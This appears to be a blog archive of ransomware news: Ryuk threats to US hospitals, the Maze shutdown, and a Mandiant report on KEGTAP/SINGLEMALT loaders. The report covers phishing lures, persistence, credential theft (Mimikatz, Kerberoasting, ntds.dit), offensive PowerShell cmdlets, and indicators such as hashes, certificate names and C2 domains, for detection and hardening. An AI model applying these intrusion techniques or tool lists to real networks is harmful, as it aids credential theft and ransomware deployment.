Category Archives: ransomware

Halloween News Wrap: The Election, Hospital Deaths and Other Scary Cyberattack Stories

Threatpost breaks down the scariest stories of the week ended Oct. 30 haunting the security industry -- including bugs that just won't die.

Breaches down 51%, exposed records set new record with 36 billion so far

The number of records exposed has increased to a staggering 36 billion. There were 2,935 publicly reported breaches in the first three quarters of 2020, with the three months of Q3 adding an additional 8.3 billion records to what was already the “worst year on record,” Risk Based Security reveals. “The quagmire that formed in the breach landscape this Spring has continued through the third quarter of the year,” commented Inga Goddijn, Executive VP at … More

The post Breaches down 51%, exposed records set new record with 36 billion so far appeared first on Help Net Security.

US hospitals warned of threat of imminent ransomware attack

US hospitals and healthcare providers have been warned that there is evidence of a credible and imminent threat that they will be targeted by ransomware. In an alert jointly released by the FBI, the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS), the agencies reveal that it has "credible information of an increased and imminent cybercrime threat to US hospitals and healthcare providers." Read more in my article on the Bitdefender Business Insights blog.

Maze Ransomware Gang to Shut Down Operations

Security researchers learned that the Maze digital crime gang is in the process of shutting down its ransomware operations. Bleeping Computer began hearing rumors of the shutdown in early September 2020. In an email conversation, a ransomware attacker told the computer self-help site that the Maze gang had stopped encrypting new victims in September 2020 […]… Read More

The post Maze Ransomware Gang to Shut Down Operations appeared first on The State of Security.

FBI, DHS, HHS Warn of Imminent, Credible Ransomware Threat Against U.S. Hospitals

On Monday, Oct. 27, KrebsOnSecurity began following up on a tip from a reliable source that an aggressive Russian cybercriminal gang known for deploying ransomware was preparing to disrupt information technology systems at hundreds of hospitals, clinics and medical care facilities across the United States. Today, officials from the FBI and the U.S. Department of Homeland Security hastily assembled a conference call with healthcare industry executives warning about an “imminent cybercrime threat to U.S. hospitals and healthcare providers.”

The agencies on the conference call, which included the U.S. Department of Health and Human Services (HHS), warned participants about “credible information of an increased and imminent cybercrime threat to US hospitals and healthcare providers.”

The agencies said they were sharing the information “to provide warning to healthcare providers to ensure that they take timely and reasonable precautions to protect their networks from these threats.”

The warning came less than 24 hours after this author received a tip from Alex Holden, founder of Milwaukee-based cyber intelligence firm Hold Security. Holden said he saw online communications this week between cybercriminals affiliated with a Russian-speaking ransomware group known as Ryuk in which group members discussed plans to deploy ransomware at more than 400 healthcare facilities in the U.S.

One participant on the government conference call today said the agencies offered few concrete details of how healthcare organizations might better protect themselves against this threat actor or purported malware campaign.

“They didn’t share any IoCs [indicators of compromise], so it’s just been ‘patch your systems and report anything suspicious’,” said a healthcare industry veteran who sat in on the discussion.

However, others on the call said IoCs may be of little help for hospitals that have already been infiltrated by Ryuk. That’s because the malware infrastructure used by the Ryuk gang is often unique to each victim, including everything from the Microsoft Windows executable files that get dropped on the infected hosts to the so-called “command and control” servers used to transmit data between and among compromised systems.

Nevertheless, cybersecurity incident response firm Mandiant today released a list of domains and Internet addresses used by Ryuk in previous attacks throughout 2020 and up to the present day. Mandiant refers to the group by the threat actor classification “UNC1878,” and aired a webcast today detailing some of Ryuk’s latest exploitation tactics.

Charles Carmakal, senior vice president for Mandiant, told Reuters that UNC1878 is one of most brazen, heartless, and disruptive threat actors he’s observed over the course of his career.

“Multiple hospitals have already been significantly impacted by Ryuk ransomware and their networks have been taken offline,” Carmakal said.

One health industry veteran who participated in the call today and who spoke with KrebsOnSecurity on condition of anonymity said if there truly are hundreds of medical facilities at imminent risk here, that would seem to go beyond the scope of any one hospital group and may implicate some kind of electronic health record provider that integrates with many care facilities.

So far, however, nothing like hundreds of facilities have publicly reported ransomware incidents. But there have been a handful of hospitals dealing with ransomware attacks in the past few days.

Becker’s Hospital Review reported today that a ransomware attack hit Klamath Falls, Ore.-based Sky Lakes Medical Center’s computer systems.

WWNY’s Channel 7 News in New York reported yesterday that a Ryuk ransomware attack on St. Lawrence Health System led to computer infections at Caton-Potsdam, Messena and Gouverneur hospitals.

SWNewsMedia.com on Monday reported on “unidentified network activity” that caused disruption to certain operations at Ridgeview Medical Center in Waconia, Minn. SWNews says Ridgeview’s system includes Chaska’s Two Twelve Medical Center, three hospitals, clinics and other emergency and long-term care sites around the metro area.

This is a developing story. Stay tuned for further updates.

Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser

Throughout 2020, ransomware activity has become increasingly prolific, relying on an ecosystem of distinct but co-enabling operations to gain access to targets of interest before conducting extortion. Mandiant Threat Intelligence has tracked several loader and backdoor campaigns that lead to the post-compromise deployment of ransomware, sometimes within 24 hours of initial compromise. Effective and fast detection of these campaigns is key to mitigating this threat.

The malware families enabling these attacks previously reported by Mandiant to intelligence subscribers include KEGTAP/BEERBOT, SINGLEMALT/STILLBOT and WINEKEY/CORKBOT. While these malware families communicate with the same command and control infrastructure (C2) and are close to functional parity, there are minimal code overlaps across them. Other security researchers have tracked these malware families under the names BazarLoader and BazarBackdoor or Team9.

The operators conducting these campaigns have actively targeted hospitals, retirement communities, and medical centers, even in the midst of a global health crisis, demonstrating a clear disregard for human life.

Email Campaign TTPs

Campaigns distributing KEGTAP, SINGLEMALT and WINEKEY have been sent to individuals at organizations across a broad range of industries and geographies using a series of shifting delivery tactics, techniques and procedures (TTPs). Despite the frequent changes seen across these campaigns, the following has remained consistent across recent activity:

  • Emails contain an in-line link to an actor-controlled Google Docs document, typically a PDF file.
  • This document contains an in-line link to a URL hosting a malware payload.
  • Emails masquerade as generic corporate communications, including follow-ups about documents and phone calls or emails crafted to appear related to complaints, terminations, bonuses, contracts, working schedules, surveys or queries about business hours.
  • Some email communications have included the recipient’s name or employer name in the subject line and/or email body.

Despite this uniformity, the associated TTPs have otherwise changed regularly—both between campaigns and across multiple spam runs seen in the same day. Notable ways that these campaigns have varied over time include:

  • Early campaigns were delivered via Sendgrid and included in-line links to Sendgrid URLs that would redirect users to attacker-created Google documents. In contrast, recent campaigns have been delivered via attacker-controlled or compromised email infrastructure and have commonly contained in-line links to attacker-created Google documents, although they have also used links associated with the Constant Contact service.
  • The documents loaded by these in-line links are crafted to appear somewhat relevant to the theme of the email campaign and contain additional links along with instructions directing users to click on them. When clicked, these links download malware binaries with file names masquerading as document files. Across earlier campaigns these malware binaries were hosted on compromised infrastructure, however, the attackers have shifted to hosting their malware on legitimate web services, including Google Drive, Basecamp, Slack, Trello, Yougile, and JetBrains.
  • In recent campaigns, the malware payloads have been hosted on numerous URLs associated with one or more of these legitimate services. In cases where the payloads have been taken down, the actors have sometimes updated their Google documents to contain new, working links.
  • Some campaigns have also incorporated customization, including emails with internal references to the recipients’ organizations (Figure 1) and organizations’ logos embedded into the Google Docs documents (Figure 2).


Figure 1: Email containing internal references to target an organization’s name


Figure 2: Google Docs PDF document containing a target organization’s logo

Hiding the final payload behind multiple links is a simple yet effective way to bypass some email filtering technologies. Various technologies have the ability to follow links in an email to try to identify malware or malicious domains; however, the number of links followed can vary. Additionally, embedding links within a PDF document further makes automated detection and link-following difficult.

Post-Compromise TTPs

Given the possibility that accesses obtained from these campaigns may be provided to various operators to monetize, the latter-stage TTPs, including ransomware family deployed, may vary across intrusions. A notable majority of cases where Mandiant has had visibility into these post-compromise TTPs have been attributable to UNC1878, a financially motivated actor that monetizes network access via the deployment of RYUK ransomware.

Establish Foothold

Once the loader and backdoor have been executed on the initial victim host, the actors have used this initial backdoor to download POWERTRICK and/or Cobalt Strike BEACON payloads to establish a foothold. Notably, the respective loader and backdoor as well as POWERTRICK have typically been installed on a small number of hosts in observed incidents, suggesting these payloads may be reserved for establishing a foothold and performing initial network and host reconnaissance. However, BEACON is frequently found on a larger number of hosts and used throughout various stages of the attack lifecycle.

Maintain Presence

Beyond the preliminary phases of each intrusion, we have seen variations in how these attackers have maintained presence after establishing an initial foothold or moving laterally within a network. In addition to the use of common post-exploitation frameworks such as Cobalt Strike, Metasploit and EMPIRE, we have observed the use of other backdoors, including ANCHOR, that we also believe to be under control of the actors behind TrickBot.

  • The loaders associated with this activity can maintain persistence through reboot by using at least four different techniques, including creating a scheduled task, adding itself to the startup folder as a shortcut, creating a scheduled Microsoft BITS job using /setnotifycmdline, and adding itself to the Userinit value under the following registry key:
    • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon.
  • Actors have downloaded POWERTRICK, Metasploit Meterpreter, and Cobalt Strike BEACON payloads following the initial compromise. BEACON payloads have commonly been executed after moving laterally to new hosts within the victim network. The attackers have employed Cobalt Strike payloads crafted to maintain persistence through reboot via a scheduled task on critical systems in victim environments. Notably, BEACON is the backdoor observed most frequently across these incidents.
  • We have observed actors executing encoded PowerShell commands that ultimately executed instances of the PowerShell EMPIRE backdoor.
  • The actors were observed using BEACON to execute PowerLurk's Register-MaliciousWmiEvent cmdlet to register WMI events used to kill processes related to security tools and utilities, including Task Manager, WireShark, TCPView, ProcDump, Process Explorer, Process Monitor, NetStat, PSLoggedOn, LogonSessions, Process Hacker, Autoruns, AutorunsSC, RegEdit, and RegShot.
  • In at least once case, attackers have maintained access to a victim environment using stolen credentials to access corporate VPN infrastructure configured to require only single-factor authentication.

Escalate Privileges

The most commonly observed methods for escalating privileges in these incidents have involved the use of valid credentials. The actors used a variety of techniques for accessing credentials stored in memory or on disk to access privileged accounts. 

  • The actors used valid credentials obtained using MimiKatz variants to escalate privileges. We’ve observed Mimikatz being executed both from the file system of victim hosts and via PowerShell cmdlets executed via Cobalt Strike BEACON.
  • Actors have gained access to credentials via exported copies of the ntds.dit Active Directory database and SYSTEM and SECURITY registry hives from a Domain Controller. 
  • In multiple instances, the actors have launched attacks against Kerberos, including the use of RUBEUS, the MimiKatz Kerberos module, and the Invoke-Kerberoast cmdlet.

Reconnaissance

The approaches taken to perform host and network reconnaissance across these incidents varied; however, a significant portion of observed reconnaissance activity has revolved around Activity Directory enumeration using publicly available utilities such as BLOODHOUND, SHARPHOUND or ADFind, as well as the execution of PowerShell cmdlets using Cobalt Strike BEACON.

  • BEACON has been installed on a large number of systems across these intrusions and has been used to execute various reconnaissance commands including both built-in host commands and PowerShell cmdlets. Observed PowerShell cmdlets include:
    • Get-GPPPassword
    • Invoke-AllChecks
    • Invoke-BloodHound
    • Invoke-EternalBlue
    • Invoke-FileFinder
    • Invoke-HostRecon
    • Invoke-Inveigh
    • Invoke-Kerberoast
    • Invoke-LoginPrompt
    • Invoke-mimikittenz
    • Invoke-ShareFinder
    • Invoke-UserHunter
  • Mandiant has observed actors using POWERTRICK to execute built-in system commands on the initial victim host, including ipconfigfindstr, and cmd.exe.
  • The actors leveraged publicly available utilities Adfind, BLOODHOUND, SHARPHOUND, and KERBRUTE on victim networks to collect Active Directory information and credentials.
  • WMIC commands have been used to perform host reconnaissance, including listing installed software, listing running processes, and identifying operating system and system architecture.
  • The actors have used a batch script to ping all servers identified during Active Directory enumeration and output the results to res.txt
  • The actors used the Nltest command to list domain controllers.

Lateral Movement

Lateral movement was most commonly accomplished using valid credentials in combination with Cobalt Strike BEACON, RDP and SMB, or using the same backdoors used to establish a foothold in victim networks.

  • The actors have regularly leveraged Cobalt Strike BEACON and Metasploit Meterpreter to move laterally within victim environments. 
  • The actors commonly moved laterally within victim environments using compromised accounts—both those belonging to regular users and accounts with administrative privileges. In addition to the use of common post-exploitation frameworks, lateral movement has also been achieved using WMIC commands and the Windows RDP and SMB protocols. 
  • The actors used the Windows net use command to connect to Windows admin shares to move laterally.

Complete Mission

Mandiant is directly aware of incidents involving KEGTAP that included the post-compromise deployment of RYUK ransomware. We have also observed instances where ANCHOR infections, another backdoor associated with the same actors, preceded CONTI or MAZE deployment.

  • In at least one case, an executable was observed that was designed to exfiltrate files via SFTP to an attacker-controlled server.
  • The actors have used Cobalt Strike BEACON to exfiltrate data created through network reconnaissance activities as well as user files.
  • The actors were observed deleting their tools from victim hosts in an attempt to remove indicators of compromise.
  • The actors have used their access to the victim network to deploy ransomware payloads. There is evidence to suggest that RYUK ransomware was likely deployed via PsExec, but other scripts or artifacts related to the distribution process were not available for forensic analysis.

Hunting Strategies

If an organization identifies a host with an active infection believed to be an instance of KEGTAP or a parallel malware family, the following containment actions are recommended. Note that due to the velocity of this intrusion activity, these actions should be taken in parallel.

  • Isolate and perform a forensic review of any impacted systems.
  • Review incoming emails to the user that owns the impacted device for emails matching the distribution campaigns, and take action to remove the messages from all mailboxes.
  • Identify the URLs used by the phishing campaign and block them using proxy or network security devices.
  • Reset credentials for any user accounts associated with execution of the malware.
  • Perform an enterprise wide review for lateral movement authentication from the impacted systems.
  • Check authentication logs from any single-factor remote access solutions that may exist (VPN, VDI, etc) and move towards multi-factor authentication (MFA) as soon as possible.

An enterprise-wide effort should be made to identify host-based artifacts related to the execution of first-stage malware and all post-intrusion activity associated with this activity. Some baseline approaches to this have been captured as follows.

Activity associated with the KEGTAP loader can often be identified via a review of system startup folders and Userinit values under the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon registry key.

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\adobe.lnk

Figure 3: Example LNK file associated with KEGTAP persistence within a system’s startup folders

SINGLEMALT employs BITS to maintain persistence through reboot and can often be identified via a review of anomalous BITS jobs. SINGLEMALT uses a well-documented BITS persistence mechanism that intentionally creates a job to download a non-existent URL, which will trigger a failure event. The job is set to retry on a regular interval, thus ensuring the malware continues to run. To review the BITS job on a host run the command bitsadmin /list.

  • Display name may be “Adobe Update”, “System autoupdate” or another generic value.
  • Notify state may be set to Fail (Status 2).
  • FileList URL value may be set to the local host or a URL that does not exist.
  • The Notification Command Line value may contain the path to the SINGLEMALT sample and/or a command to move it to a new location then start it.
  • The Retry Delay value will be set.

WINEKEY maintains persistence through reboot via the use of registry RUN keys. Searching for anomalous RUN keys enterprise-wide can help to identify systems impacted by this malware.

Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Backup Mgr

Value: Path to the backdoor

Figure 4: Example registry RUN key used by WINEKEY to maintain persistence

The ANCHOR backdoor has been seen across a subset of intrusions associated with this activity and can often be identified via the scheduled tasks it uses to maintain persistence through reboot. The scheduled tasks created by ANCHOR are often unnamed, although that is not always the case.

  • The identification of named scheduled tasks associated with ANCHOR persistence may be constructed according to the following pattern: <Random directory within %APPDATA%> autoupdate#<random number>.
  • All unnamed scheduled tasks should be reviewed, particularly those with a creation date consistent with the time of the suspected compromise.

Although it is a low fidelity indicator, ANCHOR activity may also sometimes be identified by searching for binaries within the C:\Windows\SysWOW64 directory that have a file name matching the following pattern: <8 random lowercase chars>.exe. Stacking or sorting on file creation timestamps in the C:\Windows\SysWOW64 directory may also help identify malicious files, as the directory should be mostly static.

Post-exploitation activity associated with the deployment of ransomware following these campaigns is typically conducted using the Cobalt Strike attack framework. The BEACON payload associated with Cobalt Strike can often be identified via a review of existing registered services and service creation events (Event ID 7045), both markers of the mechanism it most commonly employs to maintain persistence.

The following are additional strategies that may aid in identifying associated activity:

  • Organizations can review web proxy logs in order to identify HXXP requests for file storage, project management, collaboration or communication services with a referrer from a Google Docs document.
  • During the associated post-compromise activity, attackers have commonly staged their tools and data in the PerfLogs directory and C$ share.
  • While collecting data used to enable later-stage operations, the attackers commonly leave instances of ntds.dit and exports of the SYSTEM and SECURITY registry hives on impacted systems.

Hardening Strategies

The actions taken by the actors to escalate privileges and move laterally in an environment use well-documented techniques that search the network and Active Directory for common misconfigurations that expose credentials and systems for abuse. Organizations can take steps to limit the impact and effectiveness of these techniques. For more in-depth recommendations see our ransomware protection white paper.

  • Harden service accounts against brute force and password guessing attacks. Most organizations have at least a few service accounts with passwords set to never expire. These passwords are likely old and insecure. Make a best effort to reset as many of these accounts as possible to long and complex passwords. In cases where it is possible, migrate to MSAs and gMSAS for automated rotation.
  • Prevent the usage of privileged accounts for lateral movement. Use GPOs to restrict the ability for privileged accounts such as Domain Administrators and privileged service accounts from initiating RDP connections and network logins.Actors often pick just a few accounts to use for RDP; by limiting the number of potential accounts, you provide detection opportunities and opportunities to slow the actor.
  • Block internet access for servers where possible. Often times there is no business need for servers, especially AD infrastructure systems, to access the Internet. The actors often choose high-uptime servers for the deployment of post-exploitation tools such as BEACON.
  • Block uncategorized and newly registered domains using web proxies or DNS filters. Often the final payload delivered via phishing is hosted on a compromised third-party website that do not have a business categorization.
  • Ensure that critical patches are installed on Windows systems as well as network infrastructure. We have observed attackers exploiting well-known vulnerabilities such as Zerologon (CVE-2020-1472) to escalate privileges in an environment prior to deploying ransomware. In other cases, possibly unrelated to UNC1878, we have observed threat actors gain access to an environment through vulnerable VPN infrastructure before deploying ransomware.

For more intelligence on ransomware and other threats, please register for Mandiant Advantage Free, a no-cost version of our threat intelligence platform. Check out this episode of State of the Hack for additional information on this threat.

Campaign Indicators

Sample Email Subjects / Patterns

  • <(first|last)-name>: Important Information
  • <Company Name>
  • <Company Name> complaint
  • <(first|last)-name>
  • <(first|last)-name>
  • Agreement cancellation message
  • Agreement cancellation notice
  • Agreement cancellation notification
  • Agreement cancellation reminder
  • Agreement suspension message
  • Agreement suspension notice
  • Agreement suspension notification
  • Agreement suspension reminder
  • Arrangement cancellation message
  • Arrangement cancellation notice
  • Arrangement cancellation notification
  • Arrangement cancellation reminder
  • Arrangement suspension message
  • Arrangement suspension notice
  • Arrangement suspension notification
  • Arrangement suspension reminder
  • Contract cancellation message
  • Contract cancellation notice
  • Contract cancellation notification
  • Contract cancellation reminder
  • Contract suspension message
  • Contract suspension notice
  • Contract suspension notification
  • Contract suspension reminder
  • debit confirmation
  • FW: <Name> Annual Bonus Report is Ready
  • FW: Urgent: <Company Name>: A Customer Complaint Request – Prompt Action Required
  • RE: <(first|last)-name>
  • RE: <(first|last)-name>: Your Payslip for October
  • RE: <Company Name> - my visit
  • RE: <Company Name> Employee Survey
  • RE: <Company Name> office
  • RE: <Name> about complaint
  • RE: <Name> bonus
  • RE: <Name> termination list
  • RE: <Name>
  • RE: <Company Name> office
  • RE: <(first|last)-name>
  • RE: <(first|last)-name> <(first|last)-name>: complaint
  • RE: <(first|last)-name>: Subpoena
  • RE: <(first|last)-name>
  • RE: <(first|last)-name>: Your Payslip for September
  • RE: about complaint
  • RE: Adopted Filer Forms
  • RE: Business hours adjustment
  • RE: Business hours realignment
  • RE: Business hours rearrangement
  • RE: Business hours restructuring
  • RE: Business schedule adjustment
  • RE: Business schedule realignment
  • RE: Business schedule rearrangement
  • RE: Business schedule restructuring
  • RE: call me
  • RE: changes
  • RE: complaint
  • RE: Complaint in <Company Name>.
  • RE: Complaint on <Name>
  • RE: customer request
  • RE: debit confirmation
  • RE: document copy
  • RE: documents list
  • RE: Edgar Filer forms renovations
  • RE: employee bonuses
  • RE: Filer Forms adaptations
  • RE: my call
  • RE: New filer form types
  • RE: office
  • RE: our meeting
  • RE: Payroll Register
  • RE: report confirmation
  • RE: situation
  • RE: Subpoena
  • RE: termination
  • RE: till 2 pm
  • RE: Urgent <Company Name> Employee Internal Survey
  • RE: visit
  • RE: what about your opinion?
  • RE: what time?
  • RE: why
  • RE: why this debit
  • RE: Working schedule adjustment
  • RE: Working schedule realignment
  • RE: Working schedule rearrangement
  • RE: Working schedule restructuring
  • RE: Your Payslip for September

Example Malware Family MD5s

  • KEGTAP
    • df00d1192451268c31c1f8568d1ff472
  • BEERBOT
    • 6c6a2bfa5846fab374b2b97e65095ec9
  • SINGLEMALT
    • 37aa5690094cb6d638d0f13851be4246
  • STILLBOT
    • 3176c4a2755ae00f4fffe079608c7b25
  • WINEKEY
    • 9301564bdd572b0773f105287d8837c4
  • CORKBOT
    • 0796f1c1ea0a142fc1eb7109a44c86cb

Code Signing Certificate CNs

  • ARTBUD RADOM SP Z O O
  • BESPOKE SOFTWARE SOLUTIONS LIMITED
  • Best Fud, OOO
  • BlueMarble GmbH
  • CHOO FSP, LLC
  • Company Megacom SP Z O O
  • ESTELLA, OOO
  • EXON RENTAL SP Z O O
  • Geksan LLC
  • GLOBAL PARK HORIZON SP Z O O
  • Infinite Programming Limited
  • James LTH d.o.o.
  • Logika OOO
  • MADAS d.o.o.
  • MUSTER PLUS SP Z O O
  • NEEDCODE SP Z O O
  • Nordkod LLC
  • NOSOV SP Z O O
  • OOO MEP
  • PLAN CORP PTY LTD
  • REGION TOURISM LLC
  • RESURS-RM OOO
  • Retalit LLC
  • Rumikon LLC
  • SNAB-RESURS, OOO
  • TARAT d.o.o.
  • TES LOGISTIKA d.o.o.
  • VAS CO PTY LTD
  • VB CORPORATE PTY. LTD.
  • VITA-DE d.o.o.

UNC1878 Indicators

A significant proportion of the post-compromise activity associated with these campaigns has involved the distribution of RYUK ransomware by a threat group tracked by Mandiant as UNC1878. As such, we are releasing indicators associated with this group.

BEACON C2s

First Seen

Domain

12/11/19

updatemanagir[.]us

12/20/19

cmdupdatewin[.]com

12/26/19

scrservallinst[.]info

1/10/20

winsystemupdate[.]com

1/11/20

jomamba[.]best

1/13/20

updatewinlsass[.]com

1/16/20

winsysteminfo[.]com

1/20/20

livecheckpointsrs[.]com

1/21/20

ciscocheckapi[.]com

1/28/20

timesshifts[.]com

1/29/20

cylenceprotect[.]com

1/30/20

sophosdefence[.]com

1/30/20

taskshedulewin[.]com

1/30/20

windefenceinfo[.]com

1/30/20

lsasswininfo[.]com

1/30/20

update-wind[.]com

1/30/20

lsassupdate[.]com

1/30/20

renovatesystem[.]com

1/31/20

updatewinsoftr[.]com

2/2/20

cleardefencewin[.]com

2/2/20

checkwinupdate[.]com

2/2/20

havesetup[.]net

2/3/20

update-wins[.]com

2/3/20

conhostservice[.]com

2/4/20

microsoftupdateswin[.]com

2/4/20

iexploreservice[.]com

2/12/20

avrenew[.]com

2/12/20

target-support[.]online

2/12/20

web-analysis[.]live

2/14/20

freeallsafe[.]com

2/17/20

windefens[.]com

2/17/20

defenswin[.]com

2/17/20

easytus[.]com

2/17/20

greattus[.]com

2/17/20

livetus[.]com

2/17/20

comssite[.]com

2/17/20

findtus[.]com

2/17/20

bigtus[.]com

2/17/20

aaatus[.]com

2/17/20

besttus[.]com

2/17/20

firsttus[.]com

2/17/20

worldtus[.]com

2/26/20

freeoldsafe[.]com

2/26/20

serviceupdates[.]net

2/26/20

topserviceupdater[.]com

2/27/20

myserviceupdater[.]com

2/29/20

myservicebooster[.]net

2/29/20

servicesbooster[.]org

2/29/20

brainschampions[.]com

2/29/20

myservicebooster[.]com

2/29/20

topservicesbooster[.]com

2/29/20

servicesbooster[.]com

2/29/20

topservicesecurity[.]org

2/29/20

topservicesecurity[.]net

2/29/20

topsecurityservice[.]net

2/29/20

myyserviceupdater[.]com

2/29/20

topservicesupdate[.]com

2/29/20

topservicesecurity[.]com

2/29/20

servicesecurity[.]org

2/29/20

myserviceconnect[.]net

3/2/20

topservicesupdates[.]com

3/2/20

yoursuperservice[.]com

3/2/20

topservicehelper[.]com

3/2/20

serviceuphelper[.]com

3/2/20

serviceshelpers[.]com

3/2/20

boostsecuritys[.]com

3/3/20

hakunamatatata[.]com

3/8/20

service-updater[.]com

3/9/20

secondserviceupdater[.]com

3/9/20

twelvethserviceupdater[.]com

3/9/20

twentiethservicehelper[.]com

3/9/20

twelfthservicehelper[.]com

3/9/20

tenthservicehelper[.]com

3/9/20

thirdserviceupdater[.]com

3/9/20

thirdservicehelper[.]com

3/9/20

tenthserviceupdater[.]com

3/9/20

thirteenthservicehelper[.]com

3/9/20

seventeenthservicehelper[.]com

3/9/20

sixteenthservicehelper[.]com

3/9/20

sixthservicehelper[.]com

3/9/20

seventhservicehelper[.]com

3/9/20

seventhserviceupdater[.]com

3/9/20

sixthserviceupdater[.]com

3/9/20

secondservicehelper[.]com

3/9/20

ninthservicehelper[.]com

3/9/20

ninethserviceupdater[.]com

3/9/20

fourteenthservicehelper[.]com

3/9/20

fourthserviceupdater[.]com

3/9/20

firstserviceupdater[.]com

3/9/20

firstservisehelper[.]com

3/9/20

fifthserviceupdater[.]com

3/9/20

eleventhserviceupdater[.]com

3/9/20

fifthservicehelper[.]com

3/9/20

fourservicehelper[.]com

3/9/20

eighthservicehelper[.]com

3/9/20

eighteenthservicehelper[.]com

3/9/20

eighthserviceupdater[.]com

3/9/20

fifteenthservicehelper[.]com

3/9/20

nineteenthservicehelper[.]com

3/9/20

eleventhservicehelper[.]com

3/14/20

thirdservice-developer[.]com

3/14/20

fifthservice-developer[.]com

3/15/20

firstservice-developer[.]com

3/16/20

fourthservice-developer[.]com

3/16/20

ninethservice-developer[.]com

3/16/20

seventhservice-developer[.]com

3/16/20

secondservice-developer[.]com

3/16/20

sixthservice-developer[.]com

3/16/20

tenthservice-developer[.]com

3/16/20

eithtservice-developer[.]com

3/17/20

servicedupdater[.]com

3/17/20

service-updateer[.]com

3/19/20

sexyservicee[.]com

3/19/20

serviceboostnumberone[.]com

3/19/20

servicedbooster[.]com

3/19/20

service-hunter[.]com

3/19/20

servicedhunter[.]com

3/19/20

servicedpower[.]com

3/19/20

sexycservice[.]com

3/23/20

yourserviceupdater[.]com

3/23/20

top-serviceupdater[.]com

3/23/20

top-servicebooster[.]com

3/23/20

serviceshelps[.]com

3/23/20

servicemonsterr[.]com

3/23/20

servicehunterr[.]com

3/23/20

service-helpes[.]com

3/23/20

servicecheckerr[.]com

3/23/20

newservicehelper[.]com

3/23/20

huntersservice[.]com

3/23/20

helpforyourservice[.]com

3/23/20

boostyourservice[.]com

3/26/20

developmasters[.]com

3/26/20

actionshunter[.]com

5/4/20

info-develop[.]com

5/4/20

ayechecker[.]com

5/4/20

service-booster[.]com

9/18/20

zapored[.]com

9/22/20

gtrsqer[.]com

9/22/20

chalengges[.]com

9/22/20

caonimas[.]com

9/22/20

hakunaman[.]com

9/22/20

getinformationss[.]com

9/22/20

nomadfunclub[.]com

9/22/20

harddagger[.]com

9/22/20

errvghu[.]com

9/22/20

reginds[.]com

9/22/20

gameleaderr[.]com

9/22/20

razorses[.]com

9/22/20

vnuret[.]com

9/22/20

regbed[.]com

9/22/20

bouths[.]com

9/23/20

ayiyas[.]com

9/23/20

serviceswork[.]net

9/23/20

moonshardd[.]com

9/23/20

hurrypotter[.]com

9/23/20

biliyilish[.]com

9/23/20

blackhoall[.]com

9/23/20

checkhunterr[.]com

9/23/20

daggerclip[.]com

9/23/20

check4list[.]com

9/24/20

chainnss[.]com

9/29/20

hungrrybaby[.]com

9/30/20

martahzz[.]com

10/1/20

jonsonsbabyy[.]com

10/1/20

wondergodst[.]com

10/1/20

zetrexx[.]com

10/1/20

tiancaii[.]com

10/1/20

cantliee[.]com

10/1/20

realgamess[.]com

10/1/20

maybebaybe[.]com

10/1/20

saynoforbubble[.]com

10/1/20

chekingking[.]com

10/1/20

rapirasa[.]com

10/1/20

raidbossa[.]com

10/1/20

mountasd[.]com

10/1/20

puckhunterrr[.]com

10/1/20

pudgeee[.]com

10/1/20

loockfinderrs[.]com

10/1/20

lindasak[.]com

10/1/20

bithunterr[.]com

10/1/20

voiddas[.]com

10/1/20

sibalsakie[.]com

10/1/20

giveasees[.]com

10/1/20

shabihere[.]com

10/1/20

tarhungangster[.]com

10/1/20

imagodd[.]com

10/1/20

raaidboss[.]com

10/1/20

sunofgodd[.]com

10/1/20

rulemonster[.]com

10/1/20

loxliver[.]com

10/1/20

servicegungster[.]com

10/1/20

kungfupandasa[.]com

10/2/20

check1domains[.]com

10/5/20

sweetmonsterr[.]com

10/5/20

qascker[.]com

10/7/20

remotessa[.]com

10/7/20

cheapshhot[.]com

10/7/20

havemosts[.]com

10/7/20

unlockwsa[.]com

10/7/20

sobcase[.]com

10/7/20

zhameharden[.]com

10/7/20

mixunderax[.]com

10/7/20

bugsbunnyy[.]com

10/7/20

fastbloodhunter[.]com

10/7/20

serviceboosterr[.]com

10/7/20

servicewikii[.]com

10/7/20

secondlivve[.]com

10/7/20

quwasd[.]com

10/7/20

luckyhunterrs[.]com

10/7/20

wodemayaa[.]com

10/7/20

hybriqdjs[.]com

10/7/20

gunsdrag[.]com

10/7/20

gungameon[.]com

10/7/20

servicemount[.]com

10/7/20

servicesupdater[.]com

10/7/20

service-boosterr[.]com

10/7/20

serviceupdatter[.]com

10/7/20

dotmaingame[.]com

10/12/20

backup1service[.]com

10/13/20

bakcup-monster[.]com

10/13/20

bakcup-checker[.]com

10/13/20

backup-simple[.]com

10/13/20

backup-leader[.]com

10/13/20

backup-helper[.]com

10/13/20

service-checker[.]com

10/13/20

nasmastrservice[.]com

10/14/20

service-leader[.]com

10/14/20

nas-simple-helper[.]com

10/14/20

nas-leader[.]com

10/14/20

boost-servicess[.]com

10/14/20

elephantdrrive[.]com

10/15/20

service-hellper[.]com

10/16/20

top-backuphelper[.]com

10/16/20

best-nas[.]com

10/16/20

top-backupservice[.]com

10/16/20

bestservicehelper[.]com

10/16/20

backupnas1[.]com

10/16/20

backupmastter[.]com

10/16/20

best-backup[.]com

10/17/20

viewdrivers[.]com

10/19/20

topservicebooster[.]com

10/19/20

topservice-masters[.]com

10/19/20

topbackupintheworld[.]com

10/19/20

topbackup-helper[.]com

10/19/20

simple-backupbooster[.]com

10/19/20

top3-services[.]com

10/19/20

backup1services[.]com

10/21/20

backupmaster-service[.]com

10/21/20

backupmasterservice[.]com

10/21/20

service1updater[.]com

10/21/20

driverdwl[.]com

10/21/20

backup1master[.]com

10/21/20

boost-yourservice[.]com

10/21/20

checktodrivers[.]com

10/21/20

backup1helper[.]com

10/21/20

driver1updater[.]com

10/21/20

driver1master[.]com

10/23/20

view-backup[.]com

10/23/20

top3servicebooster[.]com

10/23/20

servicereader[.]com

10/23/20

servicehel[.]com

10/23/20

driver-boosters[.]com

10/23/20

service1update[.]com

10/23/20

service-hel[.]com

10/23/20

driver1downloads[.]com

10/23/20

service1view[.]com

10/23/20

backups1helper[.]com

10/25/20

idriveview[.]com

10/26/20

debug-service[.]com

10/26/20

idrivedwn[.]com

10/28/20

driverjumper[.]com

10/28/20

service1boost[.]com

10/28/20

idriveupdate[.]com

10/28/20

idrivehepler[.]com

